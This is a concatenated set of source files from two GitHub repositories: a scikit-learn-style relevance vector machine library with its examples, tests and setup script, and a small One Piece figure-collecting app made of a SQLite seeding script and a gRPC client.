Kernel coefficient for "rbf", "poly" and "sigmoid".
Current default is "auto" which uses 1 / n_features,
if ``gamma="scale"`` is passed then it uses 1 / (n_features * X.var())
as value of gamma. The current default of gamma, "auto", will change
to "scale" in version 0.22. "auto_deprecated", a deprecated version of
"auto" is used as a default indicating that no explicit value of gamma
was passed.
coef0 : float, optional (default=0.0)
Independent term in kernel function. It is only significant in "poly"
and "sigmoid".
tol : float, optional (default=1e-6)
Tolerance for stopping criterion.
threshold_alpha : float, optional (default=1e5)
Threshold for alpha selection criterion.
beta_fixed : {"not_fixed"} or float, optional (default="not_fixed")
Fixed value for beta. If "not_fixed" selected, the beta is updated at
each iteration.
alpha_max : int, optional (default=1e9)
Basis functions associated with alpha value beyond this limit will be
purged. Must be a positive and big number.
init_alpha : array-like of shape (n_sample) or None, optional (default=None)
Initial value for alpha. If None is selected, the initial value of
alpha is defined by init_alpha = 1 / M ** 2.
bias_used : boolean, optional (default=False)
Specifies if a constant (a.k.a. bias) should be added to the decision
function.
max_iter : int, optional (default=5000)
Hard limit on iterations within solver.
compute_score : boolean, optional (default=False)
Specifies if the objective function is computed at each step of the model.
verbose : boolean, optional (default=False)
Enable verbose output.
Attributes
----------
relevance_ : array-like, shape (n_relevance)
Indices of relevance vectors.
relevance_vectors_ : array-like, shape (n_relevance, n_features)
Relevance vectors (equivalent to X[relevance_]).
alpha_ : array-like, shape (n_samples)
Estimated alpha values.
gamma_ : array-like, shape (n_samples)
Estimated gamma values.
Phi_ : array-like, shape (n_samples, n_features)
Estimated phi values.
Sigma_ : array-like, shape (n_samples, n_features)
Estimated covariance matrix of the weights.
mu_ : array-like, shape (n_relevance, n_features)
Coefficients of the classifier (mean of posterior distribution)
coef_ : array, shape (n_class * (n_class-1) / 2, n_features)
Coefficients of the classifier (mean of posterior distribution).
Weights assigned to the features. This is only available in the case
of a linear kernel. `coef_` is a readonly property derived from `mu`
and `relevance_vectors_`.
See Also
--------
EMRVR
Relevant Vector Machine for Regression.
Notes
-----
**References:**
`The relevance vector machine.
<http://www.miketipping.com/sparsebayes.htm>`__
"""
def __init__(self, n_iter_posterior=50, kernel="rbf", degree=3,
             gamma="auto_deprecated", coef0=0.0, tol=1e-3,
             threshold_alpha=1e9, beta_fixed="not_fixed", alpha_max=1e10,
             init_alpha=None, bias_used=True, max_iter=5000,
             compute_score=False, epsilon=1e-08, verbose=False):
    # n_iter_posterior caps the Newton-CG iterations used by
    # _posterior(); everything else is stored by BaseRVM.__init__.
    self.n_iter_posterior = n_iter_posterior
    super().__init__(
        kernel=kernel, degree=degree, gamma=gamma, coef0=coef0, tol=tol,
        threshold_alpha=threshold_alpha, beta_fixed=beta_fixed,
        alpha_max=alpha_max, init_alpha=init_alpha, bias_used=bias_used,
        max_iter=max_iter, compute_score=compute_score, epsilon=epsilon,
        verbose=verbose)
def _classify(self, mu, Phi_):
    """Map the linear scores Phi_ @ mu through the logistic sigmoid."""
    scores = np.dot(Phi_, mu)
    return expit(scores)
def _log_posterior(self, mu, alpha, Phi_, t):
    """ Calculate log posterior.

    Returns the *negative* log posterior and its gradient w.r.t. mu,
    in the (value, jacobian) form expected by scipy's minimize with
    jac=True (see _posterior).
    """
    y = self._classify(mu, Phi_)
    # Negative Bernoulli log-likelihood over both classes.
    log_p = -1 * (np.sum(np.log(y[t == 1]), 0) +
                  np.sum(np.log(1 - y[t == 0]), 0))
    # Gaussian prior penalty 0.5 * mu^T A mu with A = diag(alpha).
    log_p = log_p + 0.5 * np.dot(mu.T, np.dot(np.diag(alpha), mu))
    jacobian = np.dot(np.diag(alpha), mu) - np.dot(Phi_.T, (t - y))
    return log_p, jacobian
def _compute_hessian(self, mu, alpha, Phi_, t):
    """ Perform the Inverse of Covariance.

    Returns A + Phi^T B Phi with A = diag(alpha) and
    B = diag(y * (1 - y)), i.e. the Hessian of the negative log
    posterior.  *t* is unused here -- kept for a uniform signature
    with _log_posterior (scipy passes the same args to both).
    """
    y = self._classify(mu, Phi_)
    B = np.diag(y * (1 - y))
    return np.diag(alpha) + np.dot(Phi_.T, np.dot(B, Phi_))
def _posterior(self):
    """ Calculate the posterior likelihood.

    Laplace approximation: finds the mode of the posterior over the
    weights with Newton-CG (updates self.mu_) and sets self.Sigma_ to
    the inverse Hessian at that mode.
    """
    result = minimize(
        fun=self._log_posterior,
        hess=self._compute_hessian,
        x0=self.mu_,
        args=(self.alpha_, self.Phi_, self.t),
        method="Newton-CG",
        jac=True,  # _log_posterior returns (value, gradient)
        options={
            "maxiter": self.n_iter_posterior
        }
    )
    self.mu_ = result.x
    hessian = self._compute_hessian(self.mu_, self.alpha_, self.Phi_,
                                    self.t)
    # Calculate Sigma
    # Use Cholesky decomposition for efficiency
    # Ref: https://arxiv.org/abs/1111.4144
    chol_fail = False
    try:
        upper = scipy.linalg.cholesky(hessian)
    except linalg.LinAlgError:
        warnings.warn("Hessian not positive definite")
        chol_fail = True
    if chol_fail:
        # Fallback: direct inverse, then pseudo-inverse.
        try:
            self.Sigma_ = np.linalg.inv(hessian)
        except linalg.LinAlgError:
            warnings.warn("Using Pseudo-Inverse")
            self.Sigma_ = np.linalg.pinv(hessian)
    else:
        try:
            upper_inv = np.linalg.inv(upper)
        except linalg.LinAlgError:
            warnings.warn("Using Pseudo-Inverse")
            upper_inv = np.linalg.pinv(upper)
        # Sigma = inv(H) = inv(U) @ inv(U)^H for H = U^T U.
        self.Sigma_ = np.dot(upper_inv, upper_inv.conj().T)
def fit(self, X, y):
    """Fit the RVC model according to the given training data.

    Binary problems are solved directly; multiclass problems are
    delegated to a one-vs-rest ensemble built from this estimator.

    Parameters
    ----------
    X : array-like, shape (n_samples, n_features)
        Training vectors.
    y : array-like, shape (n_samples,)
        Target values.

    Returns
    -------
    self : object
    """
    X, y = check_X_y(X, y, y_numeric=True, ensure_min_samples=2,
                     dtype="float64")
    if self.kernel == "precomputed" and X.shape[0] != X.shape[1]:
        raise ValueError("X.shape[0] should be equal to X.shape[1]")
    # Resolve the effective gamma (mirrors sklearn's SVM deprecation path).
    if self.gamma in ("scale", "auto_deprecated"):
        X_var = X.var()
        if self.gamma == "scale":
            if X_var != 0:
                self._gamma = 1.0 / (X.shape[1] * X_var)
            else:
                self._gamma = 1.0
        else:
            kernel_uses_gamma = (not callable(self.kernel) and self.kernel
                                 not in ("linear", "precomputed"))
            if kernel_uses_gamma and not np.isclose(X_var, 1.0):
                # NOTE: see scikit-learn PR #10331 for the deprecation plan.
                warnings.warn("The default value of gamma will change "
                              "from 'auto' to 'scale' in version 0.22 to "
                              "account better for unscaled features. Set "
                              "gamma explicitly to 'auto' or 'scale' to "
                              "avoid this warning.", FutureWarning)
            self._gamma = 1.0 / X.shape[1]
    elif self.gamma == 'auto':
        self._gamma = 1.0 / X.shape[1]
    else:
        self._gamma = self.gamma
    self.classes_ = np.unique(y)
    n_classes = len(self.classes_)
    self.scores_ = list()
    if n_classes < 2:
        raise ValueError("Need 2 or more classes.")
    elif n_classes == 2:
        # Binary case: encode targets as 0/1.
        self.t = np.zeros(y.shape)
        self.t[y == self.classes_[1]] = 1
        n_samples = X.shape[0]
        self.Phi_ = self._get_kernel(X)
        # Scale Phi based on PRoNTO implementation
        # http://www.mlnl.cs.ucl.ac.uk/pronto/
        self._scale = np.sqrt(np.sum(self.Phi_) / n_samples ** 2)
        self.Phi_ = self.Phi_ / self._scale
        if self.bias_used:
            self.Phi_ = np.hstack((np.ones((n_samples, 1)), self.Phi_))
        M = self.Phi_.shape[1]
        self.y = y
        if self.init_alpha is None:  # was `== None`
            self.init_alpha = 1 / M ** 2
        self.relevance_ = np.array(range(n_samples))
        if self.kernel != "precomputed":
            self.relevance_vectors_ = X
        else:
            self.relevance_vectors_ = None
        if self.beta_fixed == "not_fixed":
            # Suggested in the paper [1].
            self.beta_ = 1e-6
        else:
            self.beta_ = self.beta_fixed
        self.mu_ = np.zeros(M)
        self.alpha_ = self.init_alpha * np.ones(M)
        self._alpha_old = self.alpha_.copy()
        for i in range(self.max_iter):
            # Laplace-approximate the posterior: updates mu_ and Sigma_.
            self._posterior()
            # Well-determinedness parameters (gamma)
            self.gamma_ = 1 - self.alpha_ * np.diag(self.Sigma_)
            self.alpha_ = np.maximum(self.gamma_, self.epsilon) / (
                self.mu_ ** 2) + self.epsilon
            self.alpha_ = np.clip(self.alpha_, 0, self.alpha_max)
            # Beta update: was guarded by `if not self.beta_fixed:`,
            # which is always False for the default "not_fixed" string;
            # aligned with EMRVR's check.  beta_ has no consumer in the
            # classification path, so only the attribute value changes.
            if self.beta_fixed == "not_fixed":
                ed = np.sum((y - self.Phi_ @ self.mu_) ** 2)
                self.beta_ = np.maximum((n_samples - np.sum(self.gamma_)),
                                        self.epsilon) / ed + self.epsilon
            if self.compute_score:
                # Was `raise ("...")`, which itself raises TypeError
                # (exceptions must derive from BaseException).
                raise NotImplementedError("Score not yet implemented.")
            self._prune()
            if self.verbose:
                print("Iteration: {}".format(i))
                print("Alpha: {}".format(self.alpha_))
                print("Beta: {}".format(self.beta_))
                print("Gamma: {}".format(self.gamma_))
                print("m: {}".format(self.mu_))
                print("Relevance Vectors: {}".format(
                    self.relevance_.shape[0]))
                print()
            # Terminate once the largest log-alpha change is below tol.
            delta = np.amax(
                np.absolute(np.log(self.alpha_ + self.epsilon) - np.log(
                    self._alpha_old + self.epsilon)))
            if delta < self.tol and i > 1:
                break
            self._alpha_old = self.alpha_.copy()
        return self
    else:
        # Multiclass: one-vs-rest over binary copies of this estimator.
        self.multi_ = OneVsRestClassifier(self)
        self.multi_.fit(X, y)
        return self
def predict_proba(self, X):
"""Return an array of class probabilities."""
#check_is_fitted(self, ["relevance_", "mu_", "Sigma_"])
if len(self.classes_) == 2:
X = check_array(X)
n_samples = X.shape[0]
K = self._get_kernel(X, self.relevance_vectors_)
K = K / self._scale
if self.bias_used:
K = np.hstack((np.ones((n_samples, 1)), K))
y = self._classify(self.mu_, K)
return np.column_stack((1 - y, y))
else:
return self.multi_.predict_proba(X)
def predict(self, X):
"""Predict using the RVC model.
In addition to the mean of the predictive distribution, its
standard deviation can also be returned.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Query points to be evaluate.
Returns
-------
results : array, shape = (n_samples, [n_output_dims])
Mean of predictive distribution at query points
"""
# Check is fit had been called
#check_is_fitted(self, ["relevance_", "mu_", "Sigma_"])
if len(self.classes_) == 2:
y = self.predict_proba(X)
results = np.empty(y.shape[0], dtype=self.classes_.dtype)
results[y[:, 1] <= 0.5] = self.classes_[0]
results[y[:, 1] >= 0.5] = self.classes_[1]
return results
else:
return self.multi_.predict(X)
|
Mind-the-Pineapple/sklearn-rvm | examples/plot_rvm_for_classification.py | <reponame>Mind-the-Pineapple/sklearn-rvm<gh_stars>10-100
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
RVM for classification
=========================================================
Based on https://github.com/ctgk/PRML/blob/master/notebooks/ch07_Sparse_Kernel_Machines.ipynb
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn_rvm import EMRVC
def create_toy_data():
    """Build a two-class 2-D toy set: 50 points per Gaussian blob.

    Returns
    -------
    x : ndarray, shape (100, 2)
        Sample coordinates; first blob centered near (-1, -1),
        second near (+1, +1).
    y : ndarray, shape (100,)
        Integer labels: 0 for the first blob, 1 for the second.
    """
    x0 = np.random.normal(size=100).reshape(-1, 2) - 1.
    x1 = np.random.normal(size=100).reshape(-1, 2) + 1.
    x = np.concatenate([x0, x1])
    # np.int was removed in NumPy 1.24; builtin int is the documented replacement.
    y = np.concatenate([np.zeros(50), np.ones(50)]).astype(int)
    return x, y
x_train, y_train = create_toy_data()
model = EMRVC(kernel="rbf")
model.fit(x_train, y_train)
# Dense 100x100 evaluation grid over [-4, 4] x [-4, 4] for the contours.
x0, x1 = np.meshgrid(np.linspace(-4, 4, 100), np.linspace(-4, 4, 100))
x = np.array([x0, x1]).reshape(2, -1).T
# Training points, colored by class.
plt.scatter(x_train[:, 0], x_train[:, 1], s=40, c=y_train, marker="x")
# Relevance vectors drawn as hollow green circles on top.
plt.scatter(model.relevance_vectors_[:, 0], model.relevance_vectors_[:, 1], s=100, facecolor="none", edgecolor="g")
# Filled contours of P(class 1) over the grid.
plt.contourf(x0, x1, model.predict_proba(x)[:, 1].reshape(100, 100), np.linspace(0, 1, 5), alpha=0.2)
plt.colorbar()
plt.xlim(-4, 4)
plt.ylim(-4, 4)
plt.gca().set_aspect("equal", adjustable="box")
|
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/__init__.py | from .em_rvm import EMRVR, EMRVC
from ._version import __version__
__all__ = ['EMRVR', 'EMRVC', '__version__']
|
Mind-the-Pineapple/sklearn-rvm | examples/plot_compare_rvr_svr.py | <reponame>Mind-the-Pineapple/sklearn-rvm
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=====================================================================
Comparison of relevance vector machine and support vector machine
=====================================================================
"""
print(__doc__)
import time
import matplotlib.pyplot as plt
import numpy as np
from sklearn.svm import SVR
from sklearn_rvm import EMRVR
np.random.seed(8)
# NOTE(review): both the global numpy seed and a separate RandomState are
# used below — presumably intentional, but confirm the mixed seeding.
rng = np.random.RandomState(0)
# Generate sample data
X = 4 * np.pi * np.random.random(100) - 2 * np.pi
y = np.sinc(X)
y += 0.25 * (0.5 - rng.rand(X.shape[0])) # add noise
X = X[:, None]
# Fit SVR
svr = SVR(kernel="rbf", gamma="auto")
stime = time.time()
svr.fit(X, y)
print("Time for SVR fitting: %.3f" % (time.time() - stime))
# Fit RVR
rvr = EMRVR(kernel="rbf")
stime = time.time()
rvr.fit(X, y)
print("Time for RVR fitting: %.3f" % (time.time() - stime))
# Dense grid over the training interval for smooth prediction curves.
X_plot = np.linspace(-2 * np.pi, 2 * np.pi, 10000)[:, None]
# Predict using SVR
stime = time.time()
y_svr = svr.predict(X_plot)
print("Time for SVR prediction: %.3f" % (time.time() - stime))
# Predict using Rvm
stime = time.time()
y_rvr = rvr.predict(X_plot, return_std=False)
print("Time for RVR prediction: %.3f" % (time.time() - stime))
# Timed separately: returning the predictive standard deviation costs extra.
stime = time.time()
y_rvr, y_std = rvr.predict(X_plot, return_std=True)
print("Time for RVR prediction with standard-deviation: %.3f" % (time.time() - stime))
# Plot results
fig = plt.figure(figsize=(10, 5))
lw = 2
fig.suptitle("RVR versus SVR", fontsize=16)
plt.subplot(121)
plt.scatter(X, y, marker=".", c="k", label="data")
plt.plot(X_plot, np.sinc(X_plot), color="navy", lw=lw, label="True")
plt.plot(X_plot, y_svr, color="turquoise", lw=lw, label="SVR")
support_vectors_idx = svr.support_
plt.scatter(X[support_vectors_idx], y[support_vectors_idx], s=80, facecolors="none", edgecolors="r",
            label="support vectors")
plt.ylabel("target")
plt.xlabel("data")
plt.legend(loc="best", scatterpoints=1, prop={"size": 8})
plt.subplot(122)
plt.scatter(X, y, marker=".", c="k", label="data")
plt.plot(X_plot, np.sinc(X_plot), color="navy", lw=lw, label="True")
plt.plot(X_plot, y_rvr, color="darkorange", lw=lw, label="RVR")
# Shaded band: +/- one predictive standard deviation around the RVR mean.
plt.fill_between(X_plot[:, 0], y_rvr - y_std, y_rvr + y_std, color="darkorange", alpha=0.2)
relevance_vectors_idx = rvr.relevance_
plt.scatter(X[relevance_vectors_idx], y[relevance_vectors_idx], s=80, facecolors="none", edgecolors="r",
            label="relevance vectors")
plt.xlabel("data")
plt.legend(loc="best", scatterpoints=1, prop={"size": 8})
plt.show()
|
Mind-the-Pineapple/sklearn-rvm | setup.py | <gh_stars>10-100
#! /usr/bin/env python
"""A template for scikit-learn compatible packages."""
import codecs
import os
from setuptools import find_packages, setup
# get __version__ from _version.py
ver_file = os.path.join('sklearn_rvm', '_version.py')
with open(ver_file) as f:
    exec(f.read())  # defines __version__ in this module's namespace
# Package metadata consumed by setup() below.
DISTNAME = 'sklearn_rvm'
DESCRIPTION = 'An scikit-learn style implementation of Relevance Vector Machines (RVM).'
# utf-8-sig strips the BOM some editors prepend to README.rst.
with codecs.open('README.rst', encoding='utf-8-sig') as f:
    LONG_DESCRIPTION = f.read()
MAINTAINER = '<NAME>, <NAME>'
MAINTAINER_EMAIL = '<EMAIL>, <EMAIL>'
URL = 'https://github.com/Mind-the-Pineapple/sklearn-rvm'
LICENSE = 'new BSD'
DOWNLOAD_URL = 'https://github.com/Mind-the-Pineapple/sklearn-rvm'
VERSION = __version__
INSTALL_REQUIRES = ['numpy', 'scipy', 'scikit-learn']
CLASSIFIERS = ['Intended Audience :: Science/Research',
               'Intended Audience :: Developers',
               'License :: OSI Approved',
               'Programming Language :: Python',
               'Topic :: Software Development',
               'Topic :: Scientific/Engineering',
               'Operating System :: Microsoft :: Windows',
               'Operating System :: POSIX',
               'Operating System :: Unix',
               'Operating System :: MacOS',
               'Programming Language :: Python :: 3.5',
               'Programming Language :: Python :: 3.6',
               'Programming Language :: Python :: 3.7']
# Optional dependency groups: `pip install sklearn_rvm[tests]` / `[docs]`.
EXTRAS_REQUIRE = {
    'tests': [
        'pytest',
        'pytest-cov'],
    'docs': [
        'sphinx',
        'sphinx-gallery',
        'sphinx_rtd_theme',
        'numpydoc',
        'matplotlib'
    ]
}
setup(name=DISTNAME,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
version=VERSION,
download_url=DOWNLOAD_URL,
long_description=LONG_DESCRIPTION,
zip_safe=False, # the package can run out of an .egg file
classifiers=CLASSIFIERS,
packages=find_packages(),
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE) |
Mind-the-Pineapple/sklearn-rvm | examples/plot_compare_rvr_ard.py | <reponame>Mind-the-Pineapple/sklearn-rvm
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=====================================================================
Comparison of relevance vector regression and ARDRegression
=====================================================================
Based on https://scikit-learn.org/stable/auto_examples/linear_model/plot_ard.html#sphx-glr-auto-examples-linear-model-plot-ard-py
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from scipy import stats
from sklearn.linear_model import ARDRegression
from sklearn_rvm import EMRVR
# #############################################################################
# Generating simulated data with Gaussian weights
# Parameters of the example
np.random.seed(0)
n_samples, n_features = 100, 100
# Create Gaussian data
X = np.random.randn(n_samples, n_features)
# Create weights with a precision lambda_ of 4.
lambda_ = 4.
w = np.zeros(n_features)
# Only keep 10 weights of interest
# (randint may repeat indices, so slightly fewer than 10 can be non-zero)
relevant_features = np.random.randint(0, n_features, 10)
for i in relevant_features:
    w[i] = stats.norm.rvs(loc=0, scale=1. / np.sqrt(lambda_))
# Create noise with a precision alpha of 50.
alpha_ = 50.
noise = stats.norm.rvs(loc=0, scale=1. / np.sqrt(alpha_), size=n_samples)
# Create the target
y = np.dot(X, w) + noise
# #############################################################################
# Fit the ARD Regression
clf = ARDRegression(compute_score=True)
clf.fit(X, y)
rvr = EMRVR(kernel="linear")
rvr.fit(X, y)
# #############################################################################
# Plot the true weights, the estimated weights, the histogram of the
# weights, and predictions with standard deviations
plt.figure(figsize=(6, 5))
plt.title("Weights of the model")
# NOTE(review): assumes EMRVR exposes `coef_` when kernel="linear" — confirm.
plt.plot(rvr.coef_, color="darkblue", linestyle="-", linewidth=2, label="RVR estimate")
plt.plot(clf.coef_, color="yellowgreen", linestyle=":", linewidth=2, label="ARD estimate")
plt.plot(w, color="orange", linestyle="-", linewidth=2, label="Ground truth")
plt.xlabel("Features")
plt.ylabel("Values of the weights")
plt.legend(loc=1)
plt.show()
|
Mind-the-Pineapple/sklearn-rvm | examples/simple_example_precomputed.py | <reponame>Mind-the-Pineapple/sklearn-rvm<filename>examples/simple_example_precomputed.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Simple example precomputed
========================================================="""
print(__doc__)
import numpy as np
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn_rvm import EMRVC
# Generate a toy dataset: it's just a straight line with some Gaussian noise.
n_samples = 100
np.random.seed(0)
X = np.random.normal(size=n_samples)
# np.float was removed in NumPy 1.24; builtin float is the documented replacement.
y = (X > 0).astype(float)
X[X > 0] *= 4
X += .3 * np.random.normal(size=n_samples)
X = X[:, np.newaxis]
# Precompute the Gram matrix once; the classifier receives it directly.
K = pairwise_kernels(X)
# Fit the classifier
clf = EMRVC(kernel="precomputed")
clf.fit(K, y)
print(clf.predict(K))
print(clf.predict_proba(K))
print(clf.score(K, y))
|
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/tests/performance.py | # import timeit
#
#
# # Time classification with the iris dataset.
#
# setup_c = """
# from sklearn.datasets import load_iris
# from sklearn_rvm import EMRVC
# iris = load_iris()
# X = iris.data
# y = iris.target
# clf = EMRVC()
# """
#
# time = timeit.timeit("clf.fit(X, y)", setup=setup_c, number=10)
#
# print("10 runs of Iris classification fitting took {} seconds.".format(time))
#
# # Time regression with the boston ds.
#
# setup_r = """
# from sklearn.datasets import load_boston
# from sklearn_rvm import EMRVR
# boston = load_boston()
# X = boston.data
# y = boston.target
# clf = EMRVR()
# """
#
# time = timeit.timeit("clf.fit(X, y)", setup=setup_r, number=10)
#
# print("10 runs of boston refression fitting took {} seconds.".format(time)) |
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/tests/test_regressor.py | import pytest
import numpy as np
from sklearn_rvm import EMRVR
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn import datasets
# NOTE(review): load_boston was removed in scikit-learn 1.2 — pin
# scikit-learn<1.2 or migrate this fixture to another dataset.
boston = datasets.load_boston()
rng = np.random.RandomState(0)
# Shuffle with a fixed seed so the tests are deterministic.
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_simple_fit_predict():
    """Fitting two points and predicting a third should yield one value."""
    X = np.array([[0, 0], [2, 2]])
    y = np.array([0.0, 2.5])
    clf = EMRVR()
    X_test = np.array([[5, 5]])
    clf.fit(X, y)
    pred = clf.predict(X_test)
    # `pred != None` compares a numpy array element-wise (and is deprecated);
    # an identity check is what was intended.
    assert pred is not None
    assert pred.shape == (1,)
def test_precomputed_fit_predict():
    """A precomputed linear kernel should round-trip through fit/predict."""
    gram = pairwise_kernels(boston.data, metric='linear')
    model = EMRVR(kernel="precomputed")
    predictions = model.fit(gram, boston.target).predict(gram)
    assert predictions.shape == boston.target.shape
|
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/tests/test_classifier.py | #import pytest
import numpy as np
from sklearn_rvm import EMRVC
from sklearn import datasets
from sklearn.multiclass import OneVsRestClassifier
iris = datasets.load_iris()
rng = np.random.RandomState(0)
# Shuffle with a fixed seed so the tests are deterministic.
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# Iris has exactly three classes.
n_classes = 3
def test_simple_fit_predict():
    """A linearly separable 1-D problem should be classified perfectly."""
    X = np.array([-1, -1, -1, -1, 1, 1, 1, 1]).reshape(-1, 1)
    y = np.array([0, 0, 0, 0, 1, 1, 1, 1])
    clf = EMRVC()
    pred = clf.fit(X, y).predict(X)
    # `pred.all() == y.all()` compared two scalars (both False here, since each
    # array contains zeros) and passed no matter what the model predicted.
    # Compare the arrays element-wise instead.
    assert np.array_equal(pred, y)
def test_multiclass_fit_predict():
    # An explicit one-vs-rest wrapper should create one estimator per class.
    ovr = OneVsRestClassifier(EMRVC())
    pred = ovr.fit(iris.data, iris.target).predict(iris.data)
    assert len(ovr.estimators_) == n_classes
    # EMRVC handles multiclass internally via its own one-vs-rest; both routes
    # are expected to score identically.
    clf = EMRVC()
    pred2 = clf.fit(iris.data, iris.target).predict(iris.data)
    # NOTE(review): exact float equality of the two accuracies assumes both
    # paths are fully deterministic and identical — confirm.
    assert np.mean(iris.target == pred) == np.mean(iris.target == pred2)
    ovr = OneVsRestClassifier(EMRVC())
    pred = ovr.fit(iris.data, iris.target).predict(iris.data)
    # Loose sanity bound on training accuracy.
    assert np.mean(iris.target == pred) > 0.65
|
Mind-the-Pineapple/sklearn-rvm | examples/simple_example.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Simple example
=========================================================
"""
print(__doc__)
import numpy as np
from sklearn_rvm import EMRVC
# Generate a toy dataset: it's just a straight line with some Gaussian noise.
n_samples = 100
np.random.seed(0)
X = np.random.normal(size=n_samples)
# np.float was removed in NumPy 1.24; builtin float is the documented replacement.
y = (X > 0).astype(float)
X[X > 0] *= 4
X += .3 * np.random.normal(size=n_samples)
X = X[:, np.newaxis]
# Fit the classifier
clf = EMRVC(kernel="linear")
clf.fit(X, y)
print(clf.predict(X))
print(clf.predict_proba(X))
print(clf.score(X, y))
|
adrianomqsmts/OneFigure-gRPC | SQLite/data.py | <gh_stars>0
import sqlite3

conn = sqlite3.connect('oneFigure.db')
cursor = conn.cursor()

# Seed rows for the `figure` table as (name, rarity, path) tuples.
# A single parameterized executemany() replaces 51 near-identical execute()
# calls, and SQLite handles quoting (values such as "Foxfire Kin'emon" no
# longer need manual '' doubling inside the SQL text).
FIGURES = [
    ('<NAME>', 'RARA', 'Monkey D Luffy.png'),
    ('Vismoke Sanji', 'RARA', 'Sanji.png'),
    ('Roronoa Zoro', 'RARA', 'Zoro.png'),
    ('Corazon', 'COMUM', 'Corazon.png'),
    ('Monkey D. Garp', 'RARA', 'Monkey D Garp.png'),
    ('Charlotte Katakuri', 'RARA', 'Charlotte Katakuri.png'),
    ('Edward Newgate', 'ÉPICA', 'Edward Newgate.png'),
    ('Sabo', 'COMUM', 'Sabo.png'),
    ('Shanks', 'ÉPICA', 'Shanks.png'),
    ('<NAME>', 'ÉPICA', 'Gol D Roger.png'),
    ('Portgas D. Ace', 'COMUM', 'Portgas D Ace.png'),
    ('<NAME>', 'RARA', 'Silvers Rayleigh.png'),
    ('Brook', 'COMUM', 'Brook.png'),
    ('<NAME>', 'COMUM', 'T<NAME> Chopper.png'),
    ('Aokiji', 'RARA', 'Aokij.png'),
    ('Eustass Kid', 'COMUM', 'Eustass Kid.png'),
    ('Bartolomeo', 'COMUM', 'Bartolomeo.png'),
    ('A<NAME>', 'COMUM', 'Affe D. Drache.png'),
    ('Franky', 'COMUM', 'Franky.png'),
    ('Donquixote Doflamingo', 'RARA', 'Donquixote Doflamingo.png'),
    ('Boa Hancock', 'RARA', 'Boa Hancock.png'),
    ('Vinsmoke Reiju', 'COMUM', 'Vinsmoke Reiju.png'),
    ('<NAME>', 'COMUM', 'Marco the Phoenix.png'),
    ('Usopp', 'COMUM', 'Usopp.png'),
    ('<NAME>', 'COMUM', 'Nico Robin.png'),
    ('Zeff', 'COMUM', 'Zeff.png'),
    ('Crocodile', 'COMUM', 'Crocodile.png'),
    ('Smoker', 'COMUM', 'Smoker.png'),
    ('Bentham', 'COMUM', 'Bentham.png'),
    ('Emporio Ivankov', 'COMUM', 'Emporio Ivankov.png'),
    ('Nekomamushi', 'COMUM', 'Nekomamushi.png'),
    ('Bartholomew Kuma', 'COMUM', 'Bartholomew Kuma.png'),
    ('Kizaru', 'RARA', 'Kizaru.png'),
    ('<NAME>', 'COMUM', '<NAME>.png'),
    ('Juracule Mihawk', 'COMUM', 'Juracule Mihawk.png'),
    ('Cavendish', 'COMUM', 'Cavendish.png'),
    ('Perona', 'COMUM', 'Perona.png'),
    ('Benn Beckman', 'RARA', 'Benn Beckman.png'),
    ('Viola', 'COMUM', 'Viola.png'),
    ('Bepo', 'COMUM', 'Bepo.png'),
    ("Foxfire Kin'emon", 'COMUM', "Foxfire Kin'emon.png"),
    ('Nefertari Vivi', 'COMUM', 'Nefertari Vivi.png'),
    ('Caesar Clown', 'COMUM', 'Caesar Clown.png'),
    ('Basil Hawkins', 'COMUM', 'Basil Hawkins.png'),
    ('Kaido', 'COMUM', 'Kaido.png'),
    ('Eneru', 'COMUM', 'Eneru.png'),
    ('Sengoku', 'COMUM', 'Sengoku.png'),
    ('Nami', 'COMUM', 'Nami.png'),
    ('Buggy', 'RARA', 'Buggy.png'),
    ('Carrot', 'COMUM', 'Carrot.png'),
    ('Monkey D Dragon', 'ESPECIAL', 'Dragon.png'),
]
cursor.executemany(
    "INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES (?, ?, ?);",
    FIGURES,
)

# Seed rows for the `usuario` table as (name, password, balance) tuples.
USERS = [
    ('teste', '<PASSWORD>', 10000),
    ('user', 'user', 10000),
    ('fulano', '<PASSWORD>', 10000),
]
cursor.executemany(
    "INSERT INTO `usuario` (`name`, `password`, `balance`) VALUES (?, ?, ?);",
    USERS,
)

# Persist the inserts and release the connection.
conn.commit()
print('Dados inseridos com sucesso.')
conn.close()
|
adrianomqsmts/OneFigure-gRPC | controller/client.py | import grpc
import proto.message_pb2_grpc as pb2_grpc
import proto.message_pb2 as pb2
class Client(object):
    """Thin gRPC client: one method per RPC exposed by the OneFigure server.

    Each method builds a ``MessageClient`` request from its keyword
    arguments and forwards it through the stub on localhost:50051.
    """
    def __init__(self):
        self.host = 'localhost'
        self.server_port = 50051
        # Instantiate the (insecure, plaintext) channel to the local server.
        self.channel = grpc.insecure_channel('{}:{}'.format(self.host, self.server_port))
        # Bind the generated stub to the channel.
        self.stub = pb2_grpc.MessageStub(self.channel)
    def login(self, name, password):
        """Authenticate; returns the server's LoginResponse."""
        message = pb2.MessageClient(name=name, password=password)
        return self.stub.Login(message)
    def create(self, name, password):
        """Create an account; returns a Response with a success flag."""
        message = pb2.MessageClient(name=name, password=password)
        return self.stub.Create(message)
    def album(self, idUser):
        """Fetch the user's album; returns an AlbumResponse."""
        message = pb2.MessageClient(idUser=idUser)
        return self.stub.Album(message)
    def buy(self, idUser):
        """Buy a pack of figures; response carries balance and figures."""
        message = pb2.MessageClient(idUser=idUser)
        return self.stub.Buy(message)
